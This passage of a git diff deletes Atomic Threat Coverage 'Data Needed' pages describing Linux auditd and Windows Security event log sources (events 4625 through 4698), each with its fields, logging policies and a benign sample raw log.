-| **References**     | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv](https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv)</li><li>[https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | EXECVE        |
-| **Channel**        | auditd     |
-| **Provider**       | auditd    |
-| **Fields**         | <ul><li>type</li><li>msg</li><li>argc</li><li>a0</li><li>a1</li><li>a2</li><li>a3</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-type=EXECVE msg=audit(1564425065.452:651): argc=3 a0="ls" a1="-l" a2="/var/lib/pgsql"
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0055_linux_auditd_read_access_to_file.md b/Atomic_Threat_Coverage/Data_Needed/DN0055_linux_auditd_read_access_to_file.md
deleted file mode 100644
index 5d6399e..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0055_linux_auditd_read_access_to_file.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0055_linux_auditd_read_access_to_file       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux auditd log of read access to file |
-| **Logging Policy** | <ul><li>[LP0034_linux_auditd_read_access_to_file](../Logging_Policies/LP0034_linux_auditd_read_access_to_file.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv](https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv)</li><li>[https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | PATH        |
-| **Channel**        | auditd     |
-| **Provider**       | auditd    |
-| **Fields**         | <ul><li>type</li><li>msg</li><li>item</li><li>name</li><li>inode</li><li>dev</li><li>mode</li><li>ouid</li><li>ogid</li><li>rdev</li><li>obj</li><li>objtype</li><li>cap_fp</li><li>cap_fi</li><li>cap_fe</li><li>cap_fver</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-type=PATH msg=audit(1564423065.282:742): item=0 name="/etc/passwd" inode=24673227 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:passwd_file_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0056_linux_auditd_syscall.md b/Atomic_Threat_Coverage/Data_Needed/DN0056_linux_auditd_syscall.md
deleted file mode 100644
index b85115f..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0056_linux_auditd_syscall.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0056_linux_auditd_syscall       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux auditd log of specific system call (syscall) |
-| **Logging Policy** | <ul><li>[LP0033_linux_auditd_syscall](../Logging_Policies/LP0033_linux_auditd_syscall.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv](https://github.com/linux-audit/audit-documentation/blob/master/specs/fields/field-dictionary.csv)</li><li>[https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/app-audit_reference)</li><li>[https://access.redhat.com/solutions/36278](https://access.redhat.com/solutions/36278)</li><li>[https://filippo.io/linux-syscall-table/](https://filippo.io/linux-syscall-table/)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | SYSCALL        |
-| **Channel**        | auditd     |
-| **Provider**       | auditd    |
-| **Fields**         | <ul><li>type</li><li>msg</li><li>arch</li><li>syscall</li><li>success</li><li>exit</li><li>a0</li><li>a1</li><li>a2</li><li>a3</li><li>items</li><li>ppid</li><li>pid</li><li>auid</li><li>uid</li><li>gid</li><li>euid</li><li>suid</li><li>fsuid</li><li>egid</li><li>sgid</li><li>fsgid</li><li>tty</li><li>ses</li><li>comm</li><li>exe</li><li>subj</li><li>key</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-type=SYSCALL msg=audit(1529507591.700:304): arch=c000003e syscall=62 success=yes exit=0 a0=829 a1=9 a2=0 a3=829 items=0 ppid=1783 pid=1784 auid=1001 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="bash" exe="/usr/bin/bash" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="kill_rule"
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0057_4625_account_failed_to_logon.md b/Atomic_Threat_Coverage/Data_Needed/DN0057_4625_account_failed_to_logon.md
deleted file mode 100644
index 8930989..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0057_4625_account_failed_to_logon.md
+++ /dev/null
@@ -1,65 +0,0 @@
-| Title              | DN0057_4625_account_failed_to_logon       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | An account failed to log on |
-| **Logging Policy** | <ul><li>[LP0004_windows_audit_logon](../Logging_Policies/LP0004_windows_audit_logon.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4625.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4625.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>AccountName</li><li>Hostname</li><li>Computer</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>TargetUserSid</li><li>TargetUserName</li><li>TargetDomainName</li><li>Status</li><li>FailureReason</li><li>SubStatus</li><li>LogonType</li><li>LogonProcessName</li><li>AuthenticationPackageName</li><li>WorkstationName</li><li>TransmittedServices</li><li>LmPackageName</li><li>KeyLength</li><li>ProcessId</li><li>ProcessName</li><li>IpAddress</li><li>IpPort</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4625</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12546</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8010000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-08T22:54:54.962511700Z" /> 
-    <EventRecordID>229977</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="3240" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-18</Data> 
-    <Data Name="SubjectUserName">DC01$</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x3e7</Data> 
-    <Data Name="TargetUserSid">S-1-0-0</Data> 
-    <Data Name="TargetUserName">Auditor</Data> 
-    <Data Name="TargetDomainName">CONTOSO</Data> 
-    <Data Name="Status">0xc0000234</Data> 
-    <Data Name="FailureReason">%%2307</Data> 
-    <Data Name="SubStatus">0x0</Data> 
-    <Data Name="LogonType">2</Data> 
-    <Data Name="LogonProcessName">User32</Data> 
-    <Data Name="AuthenticationPackageName">Negotiate</Data> 
-    <Data Name="WorkstationName">DC01</Data> 
-    <Data Name="TransmittedServices">-</Data> 
-    <Data Name="LmPackageName">-</Data> 
-    <Data Name="KeyLength">0</Data> 
-    <Data Name="ProcessId">0x1bc</Data> 
-    <Data Name="ProcessName">C:\\Windows\\System32\\winlogon.exe</Data> 
-    <Data Name="IpAddress">127.0.0.1</Data> 
-    <Data Name="IpPort">0</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0058_4656_handle_to_an_object_was_requested.md b/Atomic_Threat_Coverage/Data_Needed/DN0058_4656_handle_to_an_object_was_requested.md
deleted file mode 100644
index f90d492..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0058_4656_handle_to_an_object_was_requested.md
+++ /dev/null
@@ -1,61 +0,0 @@
-| Title              | DN0058_4656_handle_to_an_object_was_requested       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event indicates that specific access was requested for an object.  The object could be a file system, kernel, or registry object, or a file  system object on removable storage or a device. If access was declined,  a Failure event is generated. This event generates only if the object’s  SACL has the required ACE to handle the use of specific access rights |
-| **Logging Policy** | <ul><li>[LP0104_windows_audit_removable_storage](../Logging_Policies/LP0104_windows_audit_removable_storage.md)</li><li>[LP0039_windows_audit_kernel_object](../Logging_Policies/LP0039_windows_audit_kernel_object.md)</li><li>[LP0102_windows_audit_file_system](../Logging_Policies/LP0102_windows_audit_file_system.md)</li><li>[LP0103_windows_audit_registry](../Logging_Policies/LP0103_windows_audit_registry.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4656.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4656.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>ObjectType</li><li>ObjectName</li><li>HandleId</li><li>TransactionId</li><li>AccessList</li><li>AccessReason</li><li>AccessMask</li><li>PrivilegeList</li><li>RestrictedSidCount</li><li>ProcessId</li><li>ProcessName</li><li>ResourceAttributes</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4656</EventID> 
-    <Version>1</Version> 
-    <Level>0</Level> 
-    <Task>12800</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8010000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-18T22:15:19.346776600Z" /> 
-    <EventRecordID>274057</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="524" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x4367b</Data> 
-    <Data Name="ObjectServer">Security</Data> 
-    <Data Name="ObjectType">File</Data> 
-    <Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data> 
-    <Data Name="HandleId">0x0</Data> 
-    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data> 
-    <Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data> 
-    <Data Name="AccessReason">%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data> 
-    <Data Name="AccessMask">0x12019f</Data> 
-    <Data Name="PrivilegeList">-</Data> 
-    <Data Name="RestrictedSidCount">0</Data> 
-    <Data Name="ProcessId">0x1074</Data> 
-    <Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data> 
-    <Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact\_MS",TI,0x10020,3000))</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0059_4657_registry_value_was_modified.md b/Atomic_Threat_Coverage/Data_Needed/DN0059_4657_registry_value_was_modified.md
deleted file mode 100644
index 1588445..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0059_4657_registry_value_was_modified.md
+++ /dev/null
@@ -1,58 +0,0 @@
-| Title              | DN0059_4657_registry_value_was_modified       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when a registry key value was modified. It doesn't generate  when a registry key was modified. This event generates only if "Set Value" auditing  is set in registry key’s SACL |
-| **Logging Policy** | <ul><li>[LP0103_windows_audit_registry](../Logging_Policies/LP0103_windows_audit_registry.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4657.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4657.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectName</li><li>ObjectValueName</li><li>HandleId</li><li>OperationType</li><li>OldValueType</li><li>OldValue</li><li>NewValueType</li><li>NewValue</li><li>ProcessId</li><li>ProcessName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4657</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12801</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-24T01:28:43.639634100Z" /> 
-    <EventRecordID>744725</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="4824" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x364eb</Data> 
-    <Data Name="ObjectName">\\REGISTRY\\MACHINE</Data> 
-    <Data Name="ObjectValueName">Name\_New</Data> 
-    <Data Name="HandleId">0x54</Data> 
-    <Data Name="OperationType">%%1905</Data> 
-    <Data Name="OldValueType">%%1873</Data> 
-    <Data Name="OldValue" /> 
-    <Data Name="NewValueType">%%1873</Data> 
-    <Data Name="NewValue">Andrei</Data> 
-    <Data Name="ProcessId">0xce4</Data> 
-    <Data Name="ProcessName">C:\\Windows\\regedit.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0060_4658_handle_to_an_object_was_closed.md b/Atomic_Threat_Coverage/Data_Needed/DN0060_4658_handle_to_an_object_was_closed.md
deleted file mode 100644
index 12ed6ca..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0060_4658_handle_to_an_object_was_closed.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0060_4658_handle_to_an_object_was_closed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when the handle to an object is closed. The object  could be a file system, kernel, or registry object, or a file system  object on removable storage or a device. This event generates only if  Success auditing is enabled for Audit Handle Manipulation subcategory. Typically this event is needed if you need to know how long the handle to the object was open. Otherwise, it might not have any security relevance |
-| **Logging Policy** | <ul><li>[LP0102_windows_audit_file_system](../Logging_Policies/LP0102_windows_audit_file_system.md)</li><li>[LP0042_windows_audit_handle_manipulation](../Logging_Policies/LP0042_windows_audit_handle_manipulation.md)</li><li>[LP0039_windows_audit_kernel_object](../Logging_Policies/LP0039_windows_audit_kernel_object.md)</li><li>[LP0103_windows_audit_registry](../Logging_Policies/LP0103_windows_audit_registry.md)</li><li>[LP0104_windows_audit_removable_storage](../Logging_Policies/LP0104_windows_audit_removable_storage.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4658.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4658.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>HandleId</li><li>ProcessId</li><li>ProcessName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4658</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12800</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-22T00:15:42.910428100Z" /> 
-    <EventRecordID>276724</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="5056" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x4367b</Data> 
-    <Data Name="ObjectServer">Security</Data> 
-    <Data Name="HandleId">0x18a8</Data> 
-    <Data Name="ProcessId">0xef0</Data> 
-    <Data Name="ProcessName">C:\\Windows\\explorer.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0061_4660_object_was_deleted.md b/Atomic_Threat_Coverage/Data_Needed/DN0061_4660_object_was_deleted.md
deleted file mode 100644
index ed3c766..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0061_4660_object_was_deleted.md
+++ /dev/null
@@ -1,53 +0,0 @@
-| Title              | DN0061_4660_object_was_deleted       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when an object was deleted. The object could be a  file system, kernel, or registry object. This event generates only if  "Delete" auditing is set in object’s SACL. This event doesn’t contain  the name of the deleted object (only the Handle ID). It is better to  use "4663(S): An attempt was made to access an object" with DELETE  access to track object deletion. The advantage of this event is that  it’s generated only during real delete operations. In contrast,  "4663(S): An attempt was made to access an object" also generates  during other actions, such as object renaming |
-| **Logging Policy** | <ul><li>[LP0102_windows_audit_file_system](../Logging_Policies/LP0102_windows_audit_file_system.md)</li><li>[LP0039_windows_audit_kernel_object](../Logging_Policies/LP0039_windows_audit_kernel_object.md)</li><li>[LP0103_windows_audit_registry](../Logging_Policies/LP0103_windows_audit_registry.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4660.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4660.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>HandleId</li><li>ProcessId</li><li>ProcessName</li><li>TransactionId</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4660</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>12800</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-18T21:05:28.677152100Z" /> 
-    <EventRecordID>270188</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="3060" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x4367b</Data> 
-    <Data Name="ObjectServer">Security</Data> 
-    <Data Name="HandleId">0x1678</Data> 
-    <Data Name="ProcessId">0xef0</Data> 
-    <Data Name="ProcessName">C:\\Windows\\explorer.exe</Data> 
-    <Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0062_4663_attempt_was_made_to_access_an_object.md b/Atomic_Threat_Coverage/Data_Needed/DN0062_4663_attempt_was_made_to_access_an_object.md
deleted file mode 100644
index 7d3fd7f..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0062_4663_attempt_was_made_to_access_an_object.md
+++ /dev/null
@@ -1,57 +0,0 @@
-| Title              | DN0062_4663_attempt_was_made_to_access_an_object       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event indicates that a specific operation was performed on an object.  The object could be a file system, kernel, or registry object, or a file  system object on removable storage or a device. This event generates only  if object’s SACL has required ACE to handle specific access right use.  The main difference with "4656: A handle to an object was requested."  event is that 4663 shows that access right was used instead of just  requested and 4663 doesn’t have Failure events |
-| **Logging Policy** | <ul><li>[LP0102_windows_audit_file_system](../Logging_Policies/LP0102_windows_audit_file_system.md)</li><li>[LP0039_windows_audit_kernel_object](../Logging_Policies/LP0039_windows_audit_kernel_object.md)</li><li>[LP0103_windows_audit_registry](../Logging_Policies/LP0103_windows_audit_registry.md)</li><li>[LP0104_windows_audit_removable_storage](../Logging_Policies/LP0104_windows_audit_removable_storage.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4663.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4663.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ObjectServer</li><li>ObjectType</li><li>ObjectName</li><li>HandleId</li><li>AccessList</li><li>AccessMask</li><li>ProcessId</li><li>ProcessName</li><li>ResourceAttributes</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4663</EventID> 
-    <Version>1</Version> 
-    <Level>0</Level> 
-    <Task>12800</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-09-18T22:13:54.770429700Z" /> 
-    <EventRecordID>273866</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="516" ThreadID="524" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x4367b</Data> 
-    <Data Name="ObjectServer">Security</Data> 
-    <Data Name="ObjectType">File</Data> 
-    <Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data> 
-    <Data Name="HandleId">0x1bc</Data> 
-    <Data Name="AccessList">%%4417 %%4418</Data> 
-    <Data Name="AccessMask">0x6</Data> 
-    <Data Name="ProcessId">0x458</Data> 
-    <Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data> 
-    <Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact\_MS",TI,0x10020,3000))</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0063_4697_service_was_installed_in_the_system.md b/Atomic_Threat_Coverage/Data_Needed/DN0063_4697_service_was_installed_in_the_system.md
deleted file mode 100644
index 964f0f2..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0063_4697_service_was_installed_in_the_system.md
+++ /dev/null
@@ -1,53 +0,0 @@
-| Title              | DN0063_4697_service_was_installed_in_the_system       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | A service was installed in the system |
-| **Logging Policy** | <ul><li>[LP0100_windows_audit_security_system_extension](../Logging_Policies/LP0100_windows_audit_security_system_extension.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>ServiceName</li><li>ServiceFileName</li><li>ServiceType</li><li>ServiceStartType</li><li>ServiceAccount</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-     <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-     <EventID>4697</EventID> 
-     <Version>0</Version> 
-     <Level>0</Level> 
-     <Task>12289</Task> 
-     <Opcode>0</Opcode> 
-     <Keywords>0x8020000000000000</Keywords> 
-     <TimeCreated SystemTime="2015-11-12T01:36:11.991070500Z" /> 
-     <EventRecordID>2778</EventRecordID> 
-     <Correlation ActivityID="{913FBE70-1CE6-0000-67BF-3F91E61CD101}" /> 
-     <Execution ProcessID="736" ThreadID="2800" /> 
-     <Channel>Security</Channel> 
-     <Computer>atc-win-10.atc.local</Computer> 
-     <Security /> 
-   </System>
-  - <EventData>
-     <Data Name="SubjectUserSid">S-1-5-18</Data> 
-     <Data Name="SubjectUserName">atc-win-10$</Data> 
-     <Data Name="SubjectDomainName">CONTOSO</Data> 
-     <Data Name="SubjectLogonId">0x3e7</Data> 
-     <Data Name="ServiceName">AppHostSvc</Data> 
-     <Data Name="ServiceFileName">%windir%\\system32\\svchost.exe -k apphost</Data> 
-     <Data Name="ServiceType">0x20</Data> 
-     <Data Name="ServiceStartType">2</Data> 
-     <Data Name="ServiceAccount">localSystem</Data> 
-   </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0064_4698_scheduled_task_was_created.md b/Atomic_Threat_Coverage/Data_Needed/DN0064_4698_scheduled_task_was_created.md
deleted file mode 100644
index 851df3d..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0064_4698_scheduled_task_was_created.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0064_4698_scheduled_task_was_created       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time a new scheduled task is created |
-| **Logging Policy** | <ul><li>[LP0041_windows_audit_other_object_access_events](../Logging_Policies/LP0041_windows_audit_other_object_access_events.md)</li></ul> |
